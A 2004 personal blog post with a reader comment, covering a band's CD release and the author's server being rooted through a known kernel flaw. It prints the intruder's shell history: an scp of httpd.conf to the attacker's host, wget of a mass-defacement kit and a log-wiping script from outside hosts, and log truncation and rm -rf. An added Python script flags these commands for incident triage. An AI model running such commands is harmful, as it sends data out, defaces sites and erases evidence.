Open your eyes, Everybody.. it’s always the right time..
Well, a day of good and bad spots.
First of all, let me just say, the U.S.E. CD release party _rocked_! I realize very few of my friends list lives in Seattle, and of those who do, most wouldn’t ever do anything as plebeian as listening to U.S.E., but I don’t care. It rocked. If you like the B-52s, or 80s pop in general, their CD is well worth the $12. Those of you not in the SeaTac area can buy it at their web site.
No, they’re not paying me to plug them. 😉 They’re just really good. And their music has hope – something that I’ve been missing. 😉
Anyway, second of all, Curious warned me and I was a bad Sheer and didn’t listen.. the kernel on sheer.us had two known paths to root from nonpriv’d users.. and I got owned, by
aarkan@rachacuca.homelinux.com.
An excerpt of the .bash_history, for those of you who like such things, is below:
    who
    ps aux
    cd /usr/local/apache/conf
    ls
    who
    ftp ftp.grupong.v10.com.br
    ftp ftp.grupong.v10.com.br
    ftp rachacuca.homelinux.com
    ftp rachacuca.homelinux.com
    scp httpd.conf aarkan@rachacuca.homelinux.com
    scp httpd.conf aarkan@rachacuca.homelinux.com:/home/aarkan
    cd
    cd /root
    cd .ssh
    ls
    rm know_hosts
    cat /dev/null > known_hosts
    cd /tmp
    cd /home
    ls
    cd kenny
    ls
    cd ..
    ls
    cd netlogin
    ls
    cd ..
    lls
    ls
    cd
    cd /
    mkdir mass
    cd mass
    wget www.geocities.com/xferror/mass.tgz
    wget rachacuca.homelinux.com/NG/index.html
    uname -a
    wget rachacuca.homelinux.com/NG/index.html
    rm index.html
    mv index.html.1 index.kmg
    tar zxvf mass.tgz
    ./mass /home
    chmod 777 mass
    chmod 777 mass2
    chmod 777 mass3
    cd /usr/local/apache/logs
    ls
    cat /dev/null > *
    ls -l
    cd /mass
    wget rachacuca.homelinux.com/NG/limpalog.sh
    chmod 777 limpalog.sh
    ./limpalog.sh /usr/local/apache/logs
    ls -l /usr/local/apache/logs
    ./limpalogs.sh /var/logs
    ./limpalog.sh /var/log
    ./limpalog.sh /var/log/httpd
    ./mass /home
    ./mass1 /home
    ./mass2 /home
    ./mass3 /home
    rm brk2.zip
    rm bind.zip
    rm -rf /mass
Anyway, normally I’d be completely cool with this – but he didn’t leave the old index.html’s renamed, so I’m somewhat annoyed at him.
Look, security can be a game of chess, fun for both sides – or it can be a war, involving cops and thugs and jail time and stuff. If no damage is done, it’s a lot more likely to stay the former – fun for everyone.
Hackers, ALWAYS back up what you deface. Luckily, the wayback machine had most of what was lost (I hadn’t done a backup in forever. Bad sheer number 2.. )
Anyway, so right now I’m slowly progressing through the PITA of upgrading every potentially vulnerable service..
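For responders reading a history like the one above, here is an added example (not part of the original post) that tags the commands worth a closer look: outbound copies, file truncation, downloads, world-writable chmods, recursive deletes, and execution of anything fetched or chmod'ed earlier in the same session. The tag names and patterns are this example's own heuristics, and the sample input is a subset of the excerpt's commands in their original order.

```python
import re

# Subset of the commands in the post's .bash_history excerpt, in their original order.
HISTORY = """\
who
ps aux
scp httpd.conf aarkan@rachacuca.homelinux.com:/home/aarkan
cat /dev/null > known_hosts
wget www.geocities.com/xferror/mass.tgz
tar zxvf mass.tgz
chmod 777 mass
cat /dev/null > *
wget rachacuca.homelinux.com/NG/limpalog.sh
chmod 777 limpalog.sh
./limpalog.sh /var/log
./mass /home
rm -rf /mass
"""

# (tag, pattern) pairs; the tags and patterns are this example's own heuristics.
RULES = [
    ("outbound-copy", re.compile(r"^(scp|ftp|sftp|rsync)\b")),
    ("file-truncate", re.compile(r"^(cat\s+/dev/null\s*>|:\s*>|truncate\b)")),
    ("download", re.compile(r"^(wget|curl)\b")),
    ("world-writable", re.compile(r"^chmod\s+(-R\s+)?0?777\b")),
    ("recursive-delete", re.compile(r"^rm\s+-\w*r")),
]

def triage(history):
    """Return (line_no, tag, command) for each command an analyst should review."""
    staged, hits = set(), []  # staged: names fetched or chmod'ed earlier in the session
    for n, cmd in enumerate(history.splitlines(), 1):
        words = cmd.split()
        if not words:
            continue
        tag = next((t for t, rx in RULES if rx.search(cmd.strip())), None)
        if tag == "download":
            staged.add(words[-1].rstrip("/").rsplit("/", 1)[-1])
        elif tag == "world-writable":
            staged.add(words[-1])
        elif tag is None and words[0].startswith("./") and words[0][2:] in staged:
            tag = "staged-exec"  # running something that arrived during this session
        if tag:
            hits.append((n, tag, cmd.strip()))
    return hits

if __name__ == "__main__":
    for n, tag, cmd in triage(HISTORY):
        print(f"{n:>3}  {tag:<16} {cmd}")
```

A shell history is writable by whoever held the account, so treat the hits as leads to confirm against other evidence rather than as a complete record.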
April 5th, 2004 at 7:16 am
yea.. I’m doin’ bad in the backup department too.. btw were you able to recover limpalog.sh, brk2.zip and bind.zip?
how is upgrading a pain in the ass?
just do:
apt-get update ; apt-get upgrade
errr.. unless you're not running debian..
seriously.. I’m sorry to hear you got hacked.. from the looks of it… it could have been much worse..
judging from the file sizes in your log directories.. it seems as though syslog was never killed 😉
doesn’t seem like it’s someone who knew what they were doing..
shrugs